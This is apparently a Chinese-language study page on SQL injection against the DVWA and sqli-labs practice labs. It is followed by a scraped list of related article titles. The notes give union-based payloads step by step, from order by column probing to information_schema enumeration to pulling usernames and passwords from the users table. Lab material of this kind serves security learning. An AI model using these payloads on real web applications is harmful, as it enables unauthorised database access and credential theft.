sql注入知识

dvwa


1' order by 1#
1' order by 2#
1' order by 3# 排序
1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口!
1' union select database(),user()#  联合查询
database() 查询数据库名字
user() 返回当前查询的用户名
1' union select version(),@@version_compile_os#
version() 返回网站使用数据库的版本
@@version_compile_os 获取当前操作系统
1' union select table_name, table_schema from information_schema.tables where table_schema='dvwa' #

information_schema 是 mysql 自带的一张表,这张数据表保存了Mysql服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

1' union select user, password from users#
返回users表中的user 和 password数据

sqli-labs


在MySQL5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,其中具有表schemata(数据库名),tables(表名),columns(列名或字段名)
在schemata表中,schema_name字段用来存储数据库名。
在tables表中,table_schema和table_name分别用来存储数据库名和表名
在columns表中,table_schema(数据库名)、table_name(表名)、column_name(字段名)
group_concat()函数可以将查询到的一列结果存放在一起。


http://sqli/less-1/?id=333' union select 111,222,database() -- -爆当前使用的数据库
http://sqli/Less-1/?id=333' union select 111,222,group_concat(schema_name) from information_schema.schemata -- -
爆数据库名
http://sqli/less-1/?id=333' union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- -
爆数据库的表名
http://sqli/less-1/?id=333' union select 111,222,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' -- -
爆users表中的字段信息
http://sqli/less-1/?id=333' union select 111,group_concat(username),group_concat(password) from security.users -- -
爆users表中的信息

sql字符型注入-sqli第1关相关推荐

  1. 【less-1】基于SQLI的SQL字符型报错注入

    实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 文章目录 实验目的 实验环境 实验原理 实验步骤 第一步 登录SQLI-Labs平台 第二步 登录Kali平台,启动 ...

  2. SQL注入之字符型注入练习(pikachu)

    SQL注入之字符型 实现目标:获取到pikachu下的表.数据信息 靶场:pikachu =>sql-inject=>字符型注入 2.实验步骤 第一步目标:拿到数据库名 2.1确定请求方法 ...

  3. SQL注入原理-字符型注入

    小伙伴们大家好!本期为大家带来的是SQL注入原理-字符型注入的讲解! 目录 SQL注入原理 字符型注入 一.单引号字符注入 1.测试是否存在注入点 2.判断字段个数 3.找出可以回显的字段 4.查看当 ...

  4. 【less-11】基于SQLI的POST字符型SQL注入

    实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 实验环境 实验原理 实验步骤 第一步 判断是够存在POST型注入点 ...

  5. 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(七)-SQL注入字符型

    目录 前言: 一.简介 二.项目配置 三.代码编写 四.运行测试 前言: 前面完成了 SQL 注入漏洞的数字型输入,其实 SQL 注入漏洞还有很多其他类型的注入,例如:字符型注入.宽字节注入等,相应的 ...

  6. php字符型和数字型的注入,Sql注入的分类:数字型+字符型

    Sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以 ...

  7. SQL注入学习——sqli-labs闯关(Basic Challenges)

    文章目录 前言 一.漏洞介绍 1.什么是SQL注入? 2.SQL注入原理: 3.注入漏洞分类: 二.靶场练习 基础知识: Less1 基于错误的GET单引号字符型注入 Less2 基于错误的GET数字 ...

  8. SQL注入(SQL注入(SQLi)攻击)攻击-注入点

    SQL注入被称为漏洞之王 , 是最常用的漏洞之一 , 其中PHP在这方面的贡献最大 SQL注入原理 用户在参数中插入恶意的SQL语句 , 破坏原有的SQL语法结构 , 从而执行攻击者的操作 SQL注入 ...

  9. 5-2从一个数字型注入认识sql注入漏洞

    目录 SQL Inject 漏洞-注入点类型-数字类型判断 演示:pikachu-SQL-Inject-数字型注入 SQL Inject 漏洞-注入点类型-数字类型判断 我们切换到pikachu的平台 ...

  10. mysql 数值型注入_SQL注入之PHP-MySQL实现手工注入-数字型

    SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎 ...

最新文章

  1. 任务的插入时间复杂度优化到 O(1),Timing Wheel时间轮是怎么做到的?
  2. 开发日记-20190522 关键词 读书笔记《鸟哥的Linux私房菜-基础学习篇》
  3. 【收藏】Docker安装微信
  4. python中下划线开头的命名_Python 中各种下划线的骚操作:_、_xx、xx_、__xx、__xx__、_classname_...
  5. 前端学习(381):CSS3 的视口单位vw、vh实现自适应(带有px,em,rem的简单介绍)
  6. 开学典礼上,施一公寄语:西湖大学绝不允许任何形式的学术不端!
  7. 使用Huploadify上传文件并动态传递参数到后台
  8. @程序员,我最多再等你两天!
  9. 用Apache James搭建本地邮件服务器
  10. matlab fscanf用法
  11. 建设医疗人工智能的“四步曲”
  12. 2016年我的学习记录与搜索到的网站,将持续更新,主要介绍我在公司应用ecshop的学习记录...
  13. NOIP2016 游记
  14. 游戏测试面试中问到的问题
  15. 华东师范大学 计算机 博士 毕业论文,【学位】华东师范大学博士、硕士学位论文基本格式要求...
  16. 正版rust30005_预算大概在3000以内可以买猫吗?
  17. HDL Designer Series(HDS)介绍
  18. WSL2 更换硬盘位置
  19. android的usb热插拔,Android M能让外部存储变成内部存储 支持U盘热插拔
  20. ` 这个符号叫什么名字?怎么打出来?

热门文章

  1. 雾霾太大看不清?这里有份数据支持你一键去雾
  2. canbus是什么意思_can-bus总线是什么意思?
  3. 斐讯路由器怎么设置虚拟服务器,斐讯无线路由器设置教程图解
  4. windows自带桌面远程控制
  5. 判断玩家是否开全图挂
  6. 世界三大数学猜想 哥德巴赫猜想 费马大定理: 费马猜想: 质数算法c++ 1.NP完全问题 2.霍奇猜想 3.庞加莱猜想 4.黎曼假设 5.杨-米尔斯存在性和质量缺口 6.纳卫尔-
  7. 【2019.05】腾讯防水墙滑动验证码破解 python + selenium + OpenCV
  8. notempty注解属于哪个依赖_@NotEmpty、@NotNull、@NotBlank注解解析
  9. js 打开视频文件,测试已通过
  10. 如何设置电脑桌面动态壁纸